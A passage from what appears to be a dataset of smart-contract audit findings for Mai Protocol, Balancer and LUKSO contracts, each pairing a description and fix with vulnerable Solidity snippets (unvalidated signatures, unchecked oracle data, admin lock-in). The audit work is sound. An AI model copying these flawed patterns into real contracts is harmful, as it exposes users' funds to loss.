erroneous call. Additionally, the method now enforces that only a broker can interact with the interface.\\nRequire `makerOrderParams.length > 0 && amounts.length == makerOrderParams.length`\\nRequire that `amount` or any of the `amounts[i]` provided to `matchOrders` is `>=tradingLotSize`.чч```\\nfunction matchOrders(\\n LibOrder.OrderParam memory takerOrderParam,\\n LibOrder.OrderParam[] memory makerOrderParams,\\n address \\_perpetual,\\n uint256[] memory amounts\\n) public {\\n```\\n -AMM - Liquidity provider may lose up to lotSize when removing liquidity AcknowledgedчmediumчWhen removing liquidity, the amount of collateral received is calculated from the `shareAmount` (ShareToken) of the liquidity provider. The liquidity removal process registers a trade on the amount, with the liquidity provider and `AMM` taking opposite sides. Because trading only accepts multiple of the `lotSize`, the leftover is discarded. The amount discarded may be up to `lotSize - 1`.\\nThe expectation is that this value should not be too high, but as `lotSize` can be set to arbitrary values by an admin, it is possible that this step discards significant value. Additionally, see issue 6.6 for how this can be exploited by an admin.\\nNote that similar behavior is present in `Perpetual.liquidateFrom`, where the `liquidatableAmount` calculated undergoes a similar modulo operation:\\n```\\nuint256 liquidatableAmount = totalPositionSize.sub(totalPositionSize.mod(governance.lotSize));\\nliquidationAmount = liquidationAmount.ceil(governance.lotSize).min(maxAmount).min(liquidatableAmount);\\n```\\n\\n`lotSize` can arbitrarily be set up to `pos_int256_max` as long as `tradingLotSize % `lotSize` == 0`\\n```\\n} else if (key == \"lotSize\") {\\n require(\\n governance.tradingLotSize == 0 || governance.tradingLotSize.mod(value.toUint256()) == 0,\\n \"require tls % ls == 0\"\\n );\\n governance.lotSize = value.toUint256();\\n} else if (key == \"tradingLotSize\") {\\n require(governance.lotSize == 0 || value.toUint256().mod(governance.lotSize) == 0, \"require tls % ls == 0\");\\n governance.tradingLotSize = value.toUint256();\\n```\\n\\n`amount` is derived from `shareAmount` rounded down to the next multiple of the `lotSize`. The leftover is discarded.\\n```\\nuint256 amount = shareAmount.wmul(oldPoolPositionSize).wdiv(shareToken.totalSupply());\\namount = amount.sub(amount.mod(perpetualProxy.lotSize()));\\n\\nperpetualProxy.transferBalanceOut(trader, price.wmul(amount).mul(2));\\nburnShareTokenFrom(trader, shareAmount);\\nuint256 opened = perpetualProxy.trade(trader, LibTypes.Side.LONG, price, amount);\\n```\\nчEnsure that documentation makes users aware of the fact that they may lose up to `lotsize-1` in value.\\nAlternatively, track accrued value and permit trades on values that exceed `lotSize`. Note that this may add significant complexity.\\nEnsure that similar system behavior, like the `liquidatableAmount` calculated in `Perpetual.liquidateFrom`, is also documented and communicated clearly to users.чч```\\nuint256 liquidatableAmount = totalPositionSize.sub(totalPositionSize.mod(governance.lotSize));\\nliquidationAmount = liquidationAmount.ceil(governance.lotSize).min(maxAmount).min(liquidatableAmount);\\n```\\n -Oracle - Unchecked oracle response timestamp and integer over/underflowчmediumчThe external Chainlink oracle, which provides index price information to the system, introduces risk inherent to any dependency on third-party data sources. For example, the oracle could fall behind or otherwise fail to be maintained, resulting in outdated data being fed to the index price calculations of the AMM. Oracle reliance has historically resulted in crippled on-chain systems, and complications that lead to these outcomes can arise from things as simple as network congestion.\\nEnsuring that unexpected oracle return values are properly handled will reduce reliance on off-chain components and increase the resiliency of the smart contract system that depends on them.\\nThe `ChainlinkAdapter` and `InversedChainlinkAdapter` take the oracle's (int256) `latestAnswer` and convert the result using `chainlinkDecimalsAdapter`. This arithmetic operation can underflow/overflow if the Oracle provides a large enough answer:\\n```\\nint256 public constant chainlinkDecimalsAdapter = 10\\*\\*10;\\n\\nconstructor(address \\_feeder) public {\\n feeder = IChainlinkFeeder(\\_feeder);\\n}\\n\\nfunction price() public view returns (uint256 newPrice, uint256 timestamp) {\\n newPrice = (feeder.latestAnswer() \\* chainlinkDecimalsAdapter).toUint256();\\n timestamp = feeder.latestTimestamp();\\n}\\n```\\n\\n```\\nint256 public constant chainlinkDecimalsAdapter = 10\\*\\*10;\\n\\nconstructor(address \\_feeder) public {\\n feeder = IChainlinkFeeder(\\_feeder);\\n}\\n\\nfunction price() public view returns (uint256 newPrice, uint256 timestamp) {\\n newPrice = ONE.wdiv(feeder.latestAnswer() \\* chainlinkDecimalsAdapter).toUint256();\\n timestamp = feeder.latestTimestamp();\\n}\\n```\\n\\nThe oracle provides a timestamp for the `latestAnswer` that is not validated and may lead to old oracle timestamps being accepted (e.g. caused by congestion on the blockchain or a directed censorship attack).\\n```\\n timestamp = feeder.latestTimestamp();\\n}\\n```\\nчUse `SafeMath` for mathematical computations\\nVerify `latestAnswer` is within valid bounds (!=0)\\nVerify `latestTimestamp` is within accepted bounds (not in the future, was updated within a reasonable amount of time)\\nDeduplicate code by combining both Adapters into one as the only difference is that the `InversedChainlinkAdapter` returns `ONE.wdiv(price)`.чч```\\nint256 public constant chainlinkDecimalsAdapter = 10\\*\\*10;\\n\\nconstructor(address \\_feeder) public {\\n feeder = IChainlinkFeeder(\\_feeder);\\n}\\n\\nfunction price() public view returns (uint256 newPrice, uint256 timestamp) {\\n newPrice = (feeder.latestAnswer() \\* chainlinkDecimalsAdapter).toUint256();\\n timestamp = feeder.latestTimestamp();\\n}\\n```\\n -Perpetual - Administrators can put the system into emergency mode indefinitely PendingчmediumчThere is no limitation on how long an administrator can put the `Perpetual` contract into emergency mode. Users cannot trade or withdraw funds in emergency mode and are effectively locked out until the admin chooses to put the contract in `SETTLED` mode.\\n```\\nfunction beginGlobalSettlement(uint256 price) public onlyWhitelistAdmin {\\n require(status != LibTypes.Status.SETTLED, \"already settled\");\\n settlementPrice = price;\\n status = LibTypes.Status.SETTLING;\\n emit BeginGlobalSettlement(price);\\n}\\n```\\n\\n```\\nfunction endGlobalSettlement() public onlyWhitelistAdmin {\\n require(status == LibTypes.Status.SETTLING, \"wrong perpetual status\");\\n\\n address guy = address(amm.perpetualProxy());\\n settleFor(guy);\\n status = LibTypes.Status.SETTLED;\\n\\n emit EndGlobalSettlement();\\n}\\n```\\nчResolution\\nThe client provided the following statement addressing the issue:\\nIt should be solved by voting. Moreover, we add two roles who is able to disable withdrawing /pause the system.\\nThe duration of the emergency phase is still unrestricted.\\nSet a time-lock when entering emergency mode that allows anyone to set the system to `SETTLED` after a fixed amount of time.чч```\\nfunction beginGlobalSettlement(uint256 price) public onlyWhitelistAdmin {\\n require(status != LibTypes.Status.SETTLED, \"already settled\");\\n settlementPrice = price;\\n status = LibTypes.Status.SETTLING;\\n emit BeginGlobalSettlement(price);\\n}\\n```\\n -Signed data may be usable cross-chainчmediumчSigned order data may be re-usable cross-chain as the chain-id is not explicitly part of the signed data.\\nIt is also recommended to further harden the signature verification and validate that `v` and `s` are within expected bounds. `ecrecover()` returns `0x0` to indicate an error condition, therefore, a `signerAddress` or `recovered` address of `0x0` should explicitly be disallowed.\\nThe signed order data currently includes the EIP712 Domain Name `Mai Protocol` and the following information:\\n```\\nstruct Order {\\n address trader;\\n address broker;\\n address perpetual;\\n uint256 amount;\\n uint256 price;\\n /\\*\\*\\n \\* Data contains the following values packed into 32 bytes\\n \\* ╔════════════════════╤═══════════════════════════════════════════════════════════╗\\n \\* ║ │ length(bytes) desc ║\\n \\* ╟────────────────────┼───────────────────────────────────────────────────────────╢\\n \\* ║ version │ 1 order version ║\\n \\* ║ side │ 1 0: buy (long), 1: sell (short) ║\\n \\* ║ isMarketOrder │ 1 0: limitOrder, 1: marketOrder ║\\n \\* ║ expiredAt │ 5 order expiration time in seconds ║\\n \\* ║ asMakerFeeRate │ 2 maker fee rate (base 100,000) ║\\n \\* ║ asTakerFeeRate │ 2 taker fee rate (base 100,000) ║\\n \\* ║ (d) makerRebateRate│ 2 rebate rate for maker (base 100) ║\\n \\* ║ salt │ 8 salt ║\\n \\* ║ isMakerOnly │ 1 is maker only ║\\n \\* ║ isInversed │ 1 is inversed contract ║\\n \\* ║ │ 8 reserved ║\\n \\* ╚════════════════════╧═══════════════════════════════════════════════════════════╝\\n \\*/\\n bytes32 data;\\n}\\n```\\n\\nSignature verification:\\n```\\nfunction isValidSignature(OrderSignature memory signature, bytes32 hash, address signerAddress)\\n internal\\n pure\\n returns (bool)\\n{\\n uint8 method = uint8(signature.config[1]);\\n address recovered;\\n uint8 v = uint8(signature.config[0]);\\n\\n if (method == uint8(SignatureMethod.ETH\\_SIGN)) {\\n recovered = ecrecover(\\n keccak256(abi.encodePacked(\"\\x19Ethereum Signed Message:\\n32\", hash)),\\n v,\\n signature.r,\\n signature.s\\n );\\n } else if (method == uint8(SignatureMethod.EIP712)) {\\n recovered = ecrecover(hash, v, signature.r, signature.s);\\n } else {\\n revert(\"invalid sign method\");\\n }\\n\\n return signerAddress == recovered;\\n}\\n```\\nчInclude the `chain-id` in the signature to avoid cross-chain validity of signatures\\nverify `s` is within valid bounds to avoid signature malleability\\n```\\nif (uint256(s) > 0x7FFFFFFFFFFFFFFFFFFFFFFFFFFFFFFF5D576E7357A4501DDFE92F46681B20A0) {\\n revert(\"ECDSA: invalid signature 's' value\");\\n }\\n```\\n\\nverify `v` is within valid bounds\\n```\\nif (v != 27 && v != 28) {\\n revert(\"ECDSA: invalid signature 'v' value\");\\n}\\n```\\n\\nreturn invalid if the result of `ecrecover()` is `0x0`чч```\\nstruct Order {\\n address trader;\\n address broker;\\n address perpetual;\\n uint256 amount;\\n uint256 price;\\n /\\*\\*\\n \\* Data contains the following values packed into 32 bytes\\n \\* ╔════════════════════╤═══════════════════════════════════════════════════════════╗\\n \\* ║ │ length(bytes) desc ║\\n \\* ╟────────────────────┼───────────────────────────────────────────────────────────╢\\n \\* ║ version │ 1 order version ║\\n \\* ║ side │ 1 0: buy (long), 1: sell (short) ║\\n \\* ║ isMarketOrder │ 1 0: limitOrder, 1: marketOrder ║\\n \\* ║ expiredAt │ 5 order expiration time in seconds ║\\n \\* ║ asMakerFeeRate │ 2 maker fee rate (base 100,000) ║\\n \\* ║ asTakerFeeRate │ 2 taker fee rate (base 100,000) ║\\n \\* ║ (d) makerRebateRate│ 2 rebate rate for maker (base 100) ║\\n \\* ║ salt │ 8 salt ║\\n \\* ║ isMakerOnly │ 1 is maker only ║\\n \\* ║ isInversed │ 1 is inversed contract ║\\n \\* ║ │ 8 reserved ║\\n \\* ╚════════════════════╧═══════════════════════════════════════════════════════════╝\\n \\*/\\n bytes32 data;\\n}\\n```\\n -Exchange - validateOrderParam does not check against SUPPORTED_ORDER_VERSIONчmediumч`validateOrderParam` verifies the signature and version of a provided order. Instead of checking against the contract constant `SUPPORTED_ORDER_VERSION` it, however, checks against a hardcoded version `2` in the method itself.\\nThis might be a problem if `SUPPORTED_ORDER_VERSION` is seen as the configuration parameter for the allowed version. Changing it would not change the allowed order version for `validateOrderParam` as this constant literal is never used.\\nAt the time of this audit, however, the `SUPPORTED_ORDER_VERSION` value equals the hardcoded value in the `validateOrderParam` method.\\n```\\nfunction validateOrderParam(IPerpetual perpetual, LibOrder.OrderParam memory orderParam)\\n internal\\n view\\n returns (bytes32)\\n{\\n address broker = perpetual.currentBroker(orderParam.trader);\\n require(broker == msg.sender, \"invalid broker\");\\n require(orderParam.getOrderVersion() == 2, \"unsupported version\");\\n require(orderParam.getExpiredAt() >= block.timestamp, \"order expired\");\\n\\n bytes32 orderHash = orderParam.getOrderHash(address(perpetual), broker);\\n require(orderParam.signature.isValidSignature(orderHash, orderParam.trader), \"invalid signature\");\\n require(filled[orderHash] < orderParam.amount, \"fullfilled order\");\\n\\n return orderHash;\\n}\\n```\\nчCheck against `SUPPORTED_ORDER_VERSION` instead of the hardcoded value `2`.чч```\\nfunction validateOrderParam(IPerpetual perpetual, LibOrder.OrderParam memory orderParam)\\n internal\\n view\\n returns (bytes32)\\n{\\n address broker = perpetual.currentBroker(orderParam.trader);\\n require(broker == msg.sender, \"invalid broker\");\\n require(orderParam.getOrderVersion() == 2, \"unsupported version\");\\n require(orderParam.getExpiredAt() >= block.timestamp, \"order expired\");\\n\\n bytes32 orderHash = orderParam.getOrderHash(address(perpetual), broker);\\n require(orderParam.signature.isValidSignature(orderHash, orderParam.trader), \"invalid signature\");\\n require(filled[orderHash] < orderParam.amount, \"fullfilled order\");\\n\\n return orderHash;\\n}\\n```\\n -LibMathSigned - wpowi returns an invalid result for a negative exponent Pendingчmediumч`LibMathSigned.wpowi(x,n)` calculates Wad value `x` (base) to the power of `n` (exponent). The exponent is declared as a signed int, however, the method returns wrong results when calculating `x ^(-n)`.\\nThe comment for the `wpowi` method suggests that `n` is a normal integer instead of a Wad-denominated value. This, however, is not being enforced.\\n`LibMathSigned.wpowi(8000000000000000000, 2) = 64000000000000000000`\\n(wrong) `LibMathSigned.wpowi(8000000000000000000, -2) = 64000000000000000000`\\n```\\n// x ^ n\\n// NOTE: n is a normal integer, do not shift 18 decimals\\n// solium-disable-next-line security/no-assign-params\\nfunction wpowi(int256 x, int256 n) internal pure returns (int256 z) {\\n z = n % 2 != 0 ? x : \\_WAD;\\n\\n for (n /= 2; n != 0; n /= 2) {\\n x = wmul(x, x);\\n\\n if (n % 2 != 0) {\\n z = wmul(z, x);\\n }\\n }\\n}\\n```\\nчMake `wpowi` support negative exponents or use the proper type for `n` (uint) and reject negative values.\\nEnforce that the exponent bounds are within sane ranges and less than a Wad to detect potential misuse where someone accidentally provides a Wad value as `n`.\\nAdd positive and negative unit-tests to fully cover this functionality.чч```\\n// x ^ n\\n// NOTE: n is a normal integer, do not shift 18 decimals\\n// solium-disable-next-line security/no-assign-params\\nfunction wpowi(int256 x, int256 n) internal pure returns (int256 z) {\\n z = n % 2 != 0 ? x : \\_WAD;\\n\\n for (n /= 2; n != 0; n /= 2) {\\n x = wmul(x, x);\\n\\n if (n % 2 != 0) {\\n z = wmul(z, x);\\n }\\n }\\n}\\n```\\n -Outdated solidity version and floating pragma PendingчmediumчUsing an outdated compiler version can be problematic especially if there are publicly disclosed bugs and issues (see also https://github.com/ethereum/solidity/releases) that affect the current compiler version.\\nThe codebase specifies a floating version of `^0.5.2` and makes use of the experimental feature `ABIEncoderV2`.\\nIt should be noted, that `ABIEncoderV2` was subject to multiple bug-fixes up until the latest 0.6.xversion and contracts compiled with earlier versions are - for example - susceptible to the following issues:\\nImplicitConstructorCallvalueCheck\\nTupleAssignmentMultiStackSlotComponents\\nMemoryArrayCreationOverflow\\nprivateCanBeOverridden\\nYulOptimizerRedundantAssignmentBreakContinue0.5\\nABIEncoderV2CalldataStructsWithStaticallySizedAndDynamicallyEncodedMembers\\nSignedArrayStorageCopy\\nABIEncoderV2StorageArrayWithMultiSlotElement\\nDynamicConstructorArgumentsClippedABIV2\\nCodebase declares compiler version ^0.5.2:\\n```\\npragma solidity ^0.5.2;\\npragma experimental ABIEncoderV2; // to enable structure-type parameters\\n```\\n\\nAccording to etherscan.io, the currently deployed main-net `AMM` contract is compiled with solidity version 0.5.8:\\nhttps://etherscan.io/address/0xb95B9fb0539Ec84DeD2855Ed1C9C686Af9A4e8b3#codeчIt is recommended to settle on the latest stable 0.6.x or 0.5.x version of the Solidity compiler and lock the pragma version to a specifically tested compiler release.чч```\\npragma solidity ^0.5.2;\\npragma experimental ABIEncoderV2; // to enable structure-type parameters\\n```\\n -AMM - ONE_WAD_U is never usedчlowчThe const `ONE_WAD_U` is declared but never used. Avoid re-declaring the same constants in multiple source-units (and unit-test cases) as this will be hard to maintain.\\n```\\nuint256 private constant ONE\\_WAD\\_U = 10\\*\\*18;\\n```\\nчRemove unused code. Import the value from a shared resource. E.g.ONE_WAD is declared multiple times in `LibMathSigned`, `LibMathUnsigned`, `AMM`, hardcoded in checks in `PerpetualGovernance.setGovernanceParameter`, `AMMGovernance.setGovernanceParameter`.чч```\\nuint256 private constant ONE\\_WAD\\_U = 10\\*\\*18;\\n```\\n -Perpetual - Variable shadowing in constructorчlowч`Perpetual` inherits from `PerpetualGovernance` and `Collateral`, which declare state variables that are shadowed in the `Perpetual` constructor.\\nLocal constructor argument shadows `PerpetualGovernance.globalConfig`, `PerpetualGovernance.devAddress`, `Collateral.collateral`\\nNote: Confusing name: `Collateral` is an inherited contract and a state variable.\\n```\\nconstructor(address globalConfig, address devAddress, address collateral, uint256 collateralDecimals)\\n public\\n Position(collateral, collateralDecimals)\\n{\\n setGovernanceAddress(\"globalConfig\", globalConfig);\\n setGovernanceAddress(\"dev\", devAddress);\\n emit CreatePerpetual();\\n}\\n```\\nчRename the parameter or state variable.чч```\\nconstructor(address globalConfig, address devAddress, address collateral, uint256 collateralDecimals)\\n public\\n Position(collateral, collateralDecimals)\\n{\\n setGovernanceAddress(\"globalConfig\", globalConfig);\\n setGovernanceAddress(\"dev\", devAddress);\\n emit CreatePerpetual();\\n}\\n```\\n -Perpetual - The specified decimals for the collateral may not reflect the token's actual decimals AcknowledgedчlowчWhen initializing the `Perpetual` contract, the deployer can decide to use either `ETH`, or an ERC20-compliant collateral. In the latter case, the deployer must provide a nonzero address for the token, as well as the number of `decimals` used by the token:\\n```\\nconstructor(address \\_collateral, uint256 decimals) public {\\n require(decimals <= MAX\\_DECIMALS, \"decimals out of range\");\\n require(\\_collateral != address(0x0) || (\\_collateral == address(0x0) && decimals == 18), \"invalid decimals\");\\n\\n collateral = \\_collateral;\\n scaler = (decimals == MAX\\_DECIMALS ? 1 : 10\\*\\*(MAX\\_DECIMALS - decimals)).toInt256();\\n}\\n```\\n\\nThe provided `decimals` value is not checked for validity and can differ from the actual token's `decimals`.чEnsure to establish documentation that makes users aware of the fact that the decimals configured are not enforced to match the actual tokens decimals. This is to allow users to audit the system configuration and decide whether they want to participate in it.чч```\\nconstructor(address \\_collateral, uint256 decimals) public {\\n require(decimals <= MAX\\_DECIMALS, \"decimals out of range\");\\n require(\\_collateral != address(0x0) || (\\_collateral == address(0x0) && decimals == 18), \"invalid decimals\");\\n\\n collateral = \\_collateral;\\n scaler = (decimals == MAX\\_DECIMALS ? 1 : 10\\*\\*(MAX\\_DECIMALS - decimals)).toInt256();\\n}\\n```\\n -AMM - Unchecked return value in ShareToken.mint Pendingчlowч`ShareToken` is an extension of the Openzeppelin ERC20Mintable pattern which exposes a method called `mint()` that allows accounts owning the minter role to mint new tokens. The return value of `ShareToken.mint()` is not checked.\\nSince the ERC20 standard does not define whether this method should return a value or revert it may be problematic to assume that all tokens revert. If, for example, an implementation is used that does not revert on error but returns a boolean error indicator instead the caller might falsely continue without the token minted.\\nWe would like to note that the functionality is intended to be used with the provided `ShareToken` and therefore the contract is safe to use assuming `ERC20Mintable.mint` reverts on error. The issue arises if the system is used with a different `ShareToken` implementation that is not implemented in the same way.\\nOpenzeppelin implementation\\n```\\nfunction mint(address account, uint256 amount) public onlyMinter returns (bool) {\\n \\_mint(account, amount);\\n return true;\\n}\\n```\\n\\nCall with unchecked return value\\n```\\nfunction mintShareTokenTo(address guy, uint256 amount) internal {\\n shareToken.mint(guy, amount);\\n}\\n```\\nчConsider wrapping the `mint` statement in a `require` clause, however, this way only tokens that are returning a boolean error indicator are supported. Document the specification requirements for the `ShareToken` and clearly state if the token is expected to revert or return an error indicator.\\nIt should also be documented that the Token exposes a `burn` method that does not adhere to the Openzeppelin `ERC20Burnable` implementation. The `ERC20Burnable` import is unused as noted in issue 6.23.чч```\\nfunction mint(address account, uint256 amount) public onlyMinter returns (bool) {\\n \\_mint(account, amount);\\n return true;\\n}\\n```\\n -Perpetual - beginGlobalSettlement can be called multiple times AcknowledgedчlowчThe system can be put into emergency mode by an admin calling `beginGlobalSettlement` and providing a fixed `settlementPrice`. The method can be invoked even when the contract is already in `SETTLING` (emergency) mode, allowing an admin to selectively adjust the settlement price again. This does not seem to be the intended behavior as calling the method again re-sets the status to `SETTLING`. Furthermore, it may affect users' behavior during the `SETTLING` phase.\\n```\\nfunction beginGlobalSettlement(uint256 price) public onlyWhitelistAdmin {\\n require(status != LibTypes.Status.SETTLED, \"already settled\");\\n settlementPrice = price;\\n status = LibTypes.Status.SETTLING;\\n emit BeginGlobalSettlement(price);\\n}\\n```\\nчEmergency mode should only be allowed to be set onceчч```\\nfunction beginGlobalSettlement(uint256 price) public onlyWhitelistAdmin {\\n require(status != LibTypes.Status.SETTLED, \"already settled\");\\n settlementPrice = price;\\n status = LibTypes.Status.SETTLING;\\n emit BeginGlobalSettlement(price);\\n}\\n```\\n -Exchange - OrderStatus is never usedчlowчThe enum `OrderStatus` is declared but never used.\\n```\\nenum OrderStatus {EXPIRED, CANCELLED, FILLABLE, FULLY\\_FILLED}\\n```\\nчResolution\\nThis issue was resolved by removing the unused code.\\nRemove unused code.чч```\\nenum OrderStatus {EXPIRED, CANCELLED, FILLABLE, FULLY\\_FILLED}\\n```\\n -LibMath - Inaccurate declaration of _UINT256_MAXчlowч`LibMathUnsigned` declares `_UINT256_MAX` as `2^255-1` while this value actually represents `_INT256_MAX`. This appears to just be a naming issue.\\n(UINT256_MAX/2-1 => pos INT256_MAX; 2**256/2-1==2**255-1)\\n```\\nlibrary LibMathUnsigned {\\n uint256 private constant \\_WAD = 10\\*\\*18;\\n uint256 private constant \\_UINT256\\_MAX = 2\\*\\*255 - 1;\\n```\\nчRename `_UINT256_MAX` to `_INT256MAX` or `_SIGNED_INT256MAX`.чч```\\nlibrary LibMathUnsigned {\\n uint256 private constant \\_WAD = 10\\*\\*18;\\n uint256 private constant \\_UINT256\\_MAX = 2\\*\\*255 - 1;\\n```\\n -LibMath - inconsistent assertion text and improve representation of literals with many digits AcknowledgedчlowчThe assertion below states that `logE only accepts v <= 1e22 * 1e18` while the argument name is `x`. In addition to that we suggest representing large literals in scientific notation.\\n```\\nfunction wln(int256 x) internal pure returns (int256) {\\n require(x > 0, \"logE of negative number\");\\n require(x <= 10000000000000000000000000000000000000000, \"logE only accepts v <= 1e22 \\* 1e18\"); // in order to prevent using safe-math\\n int256 r = 0;\\n uint8 extra\\_digits = longer\\_digits - fixed\\_digits;\\n```\\nчUpdate the inconsistent assertion text `v` -> `x` and represent large literals in scientific notation as they are otherwise difficult to read and review.чч```\\nfunction wln(int256 x) internal pure returns (int256) {\\n require(x > 0, \"logE of negative number\");\\n require(x <= 10000000000000000000000000000000000000000, \"logE only accepts v <= 1e22 \\* 1e18\"); // in order to prevent using safe-math\\n int256 r = 0;\\n uint8 extra\\_digits = longer\\_digits - fixed\\_digits;\\n```\\n -LibMath - roundHalfUp returns unfinished resultчlowчThe method `LibMathSigned.roundHalfUp(int `x`, int y)` returns the value `x` rounded up to the base `y`. The method suggests that the result is the rounded value while that's not actually true. The result for a positive `x` is `x` + base/2 and `x` - base/2 for negative values. The rounding is not yet finished as this would require a final division by base `y` to manifest the rounding.\\nIt is assumed that the final rounding step is not executed for performance reasons. However, this might easily introduce errors when the caller assumes the result is rounded for base while it is not.\\n`roundHalfUp(-4700, 1000) = -4700` instead of `5000`\\n`roundHalfUp(4700, 1000) = 4700` instead of `5000`\\n```\\n// ROUND\\_HALF\\_UP rule helper. 0.5 ≈ 1, 0.4 ≈ 0, -0.5 ≈ -1, -0.4 ≈ 0\\nfunction roundHalfUp(int256 x, int256 y) internal pure returns (int256) {\\n require(y > 0, \"roundHalfUp only supports y > 0\");\\n if (x >= 0) {\\n return add(x, y / 2);\\n }\\n return sub(x, y / 2);\\n}\\n```\\nчWe have verified the current code-base and the callers for `roundHalfUp` are correctly finishing the rounding step. However, it is recommended to finish the rounding within the method or document this behavior to prevent errors caused by code that falsely assumes that the returned value finished rounding.чч```\\n// ROUND\\_HALF\\_UP rule helper. 0.5 ≈ 1, 0.4 ≈ 0, -0.5 ≈ -1, -0.4 ≈ 0\\nfunction roundHalfUp(int256 x, int256 y) internal pure returns (int256) {\\n require(y > 0, \"roundHalfUp only supports y > 0\");\\n if (x >= 0) {\\n return add(x, y / 2);\\n }\\n return sub(x, y / 2);\\n}\\n```\\n -LibMath/LibOrder - unused named return valueчlowчThe following methods declare a named return value but explicitly return a value instead. The named return value is not used.\\n`LibMathSigned.min()`\\n`LibMathSigned.max()`\\n`LibMathUnsigned.min()`\\n`LibMathUnsigned.max()`\\n`LibOrder.getOrderHash()`\\n`LibOrder.hashOrder()`\\n```\\nfunction min(int256 x, int256 y) internal pure returns (int256 z) {\\n return x <= y ? x : y;\\n}\\n\\nfunction max(int256 x, int256 y) internal pure returns (int256 z) {\\n return x >= y ? x : y;\\n}\\n```\\n\\n```\\nfunction min(uint256 x, uint256 y) internal pure returns (uint256 z) {\\n return x <= y ? x : y;\\n}\\n\\nfunction max(uint256 x, uint256 y) internal pure returns (uint256 z) {\\n return x >= y ? x : y;\\n}\\n```\\n\\n```\\nfunction getOrderHash(Order memory order) internal pure returns (bytes32 orderHash) {\\n orderHash = LibEIP712.hashEIP712Message(hashOrder(order));\\n return orderHash;\\n}\\n```\\n\\n```\\nfunction hashOrder(Order memory order) internal pure returns (bytes32 result) {\\n bytes32 orderType = EIP712\\_ORDER\\_TYPE;\\n // solium-disable-next-line security/no-inline-assembly\\n assembly {\\n let start := sub(order, 32)\\n let tmp := mload(start)\\n mstore(start, orderType)\\n result := keccak256(start, 224)\\n mstore(start, tmp)\\n }\\n return result;\\n}\\n```\\nчRemove the named return value and explicitly return the value.чч```\\nfunction min(int256 x, int256 y) internal pure returns (int256 z) {\\n return x <= y ? x : y;\\n}\\n\\nfunction max(int256 x, int256 y) internal pure returns (int256 z) {\\n return x >= y ? x : y;\\n}\\n```\\n -Commented code exists in BMathчlowч```\\nuint tokenInRatio = bdiv(newTokenBalanceIn, tokenBalanceIn);\\n\\n// uint newPoolSupply = (ratioTi ^ weightTi) \\* poolSupply;\\nuint poolRatio = bpow(tokenInRatio, normalizedWeight);\\n```\\n\\n```\\nuint normalizedWeight = bdiv(tokenWeightOut, totalWeight);\\n// charge exit fee on the pool token side\\n// pAiAfterExitFee = pAi\\*(1-exitFee)\\nuint poolAmountInAfterExitFee = bmul(poolAmountIn, bsub(BONE, EXIT\\_FEE));\\n```\\n\\nAnd many more examples.чRemove the commented code, or address them properly. If the code is related to exit fee, which is considered to be 0 in this version, this style should be persistent in other contracts as well.чч```\\nuint tokenInRatio = bdiv(newTokenBalanceIn, tokenBalanceIn);\\n\\n// uint newPoolSupply = (ratioTi ^ weightTi) \\* poolSupply;\\nuint poolRatio = bpow(tokenInRatio, normalizedWeight);\\n```\\n -Max weight requirement in rebind is inaccurateчlowч`BPool.rebind` enforces `MIN_WEIGHT` and `MAX_WEIGHT` bounds on the passed-in `denorm` value:\\n```\\nfunction rebind(address token, uint balance, uint denorm)\\n public\\n \\_logs\\_\\n \\_lock\\_\\n{\\n\\n require(msg.sender == \\_controller, \"ERR\\_NOT\\_CONTROLLER\");\\n require(\\_records[token].bound, \"ERR\\_NOT\\_BOUND\");\\n require(!\\_finalized, \"ERR\\_IS\\_FINALIZED\");\\n\\n require(denorm >= MIN\\_WEIGHT, \"ERR\\_MIN\\_WEIGHT\");\\n require(denorm <= MAX\\_WEIGHT, \"ERR\\_MAX\\_WEIGHT\");\\n require(balance >= MIN\\_BALANCE, \"ERR\\_MIN\\_BALANCE\");\\n```\\n\\n`MIN_WEIGHT` is `1 BONE`, and `MAX_WEIGHT` is `50 BONE`.\\nThough a token weight of `50 BONE` may make sense in a single-token system, `BPool` is intended to be used with two to eight tokens. The sum of the weights of all tokens must not be greater than `50 BONE`.\\nThis implies that a weight of `50 BONE` for any single token is incorrect, given that at least one other token must be present.ч`MAX_WEIGHT` for any single token should be `MAX_WEIGHT` - MIN_WEIGHT, or `49 BONE`.чч```\\nfunction rebind(address token, uint balance, uint denorm)\\n public\\n \\_logs\\_\\n \\_lock\\_\\n{\\n\\n require(msg.sender == \\_controller, \"ERR\\_NOT\\_CONTROLLER\");\\n require(\\_records[token].bound, \"ERR\\_NOT\\_BOUND\");\\n require(!\\_finalized, \"ERR\\_IS\\_FINALIZED\");\\n\\n require(denorm >= MIN\\_WEIGHT, \"ERR\\_MIN\\_WEIGHT\");\\n require(denorm <= MAX\\_WEIGHT, \"ERR\\_MAX\\_WEIGHT\");\\n require(balance >= MIN\\_BALANCE, \"ERR\\_MIN\\_BALANCE\");\\n```\\n -Test code present in the code baseчmediumчTest code are present in the code base. This is mainly a reminder to fix those before production.\\n`rescuerAddress` and `freezerAddress` are not even in the function arguments.\\n```\\nwhitelistingAddress = \\_whitelistingAddress;\\nprojectAddress = \\_projectAddress;\\nfreezerAddress = \\_projectAddress; // TODO change, here only for testing\\nrescuerAddress = \\_projectAddress; // TODO change, here only for testing\\n```\\nчResolution\\nFixed in lukso-network/[email protected]edb880c.\\nMake sure all the variable assignments are ready for production before deployment to production.чч```\\nwhitelistingAddress = \\_whitelistingAddress;\\nprojectAddress = \\_projectAddress;\\nfreezerAddress = \\_projectAddress; // TODO change, here only for testing\\nrescuerAddress = \\_projectAddress; // TODO change, here only for testing\\n```\\n -frozenPeriod is subtracted twice for calculating the current priceчmediumчIf the contract had been frozen, the current stage price will calculate the price by subtracting the `frozenPeriod` twice and result in wrong calculation.\\n`getCurrentBlockNumber()` subtracts `frozenPeriod` once, and then `getStageAtBlock()` will also subtract the same number again.\\n```\\nfunction getCurrentStage() public view returns (uint8) {\\n return getStageAtBlock(getCurrentBlockNumber());\\n}\\n```\\n\\n```\\nfunction getCurrentBlockNumber() public view returns (uint256) {\\n return uint256(block.number)\\n .sub(frozenPeriod); // make sure we deduct any frozenPeriod from calculations\\n}\\n```\\n\\n```\\nfunction getStageAtBlock(uint256 \\_blockNumber) public view returns (uint8) {\\n\\n uint256 blockNumber = \\_blockNumber.sub(frozenPeriod); // adjust the block by the frozen period\\n```\\nчResolution\\nFound in parallel to the audit team and has been mitigated in lukso-network/[email protected]ebc4bce . The issue was further simplified by adding `getCurrentEffectiveBlockNumber()` in lukso-network/[email protected]e4c9ed5 to remove ambiguity when calculating current block number.\\nMake sure `frozenPeriod` calculation is done correctly. It could be solved by renaming `getCurrentBlockNumber()` to reflect the calculation done inside the function.\\ne.g. 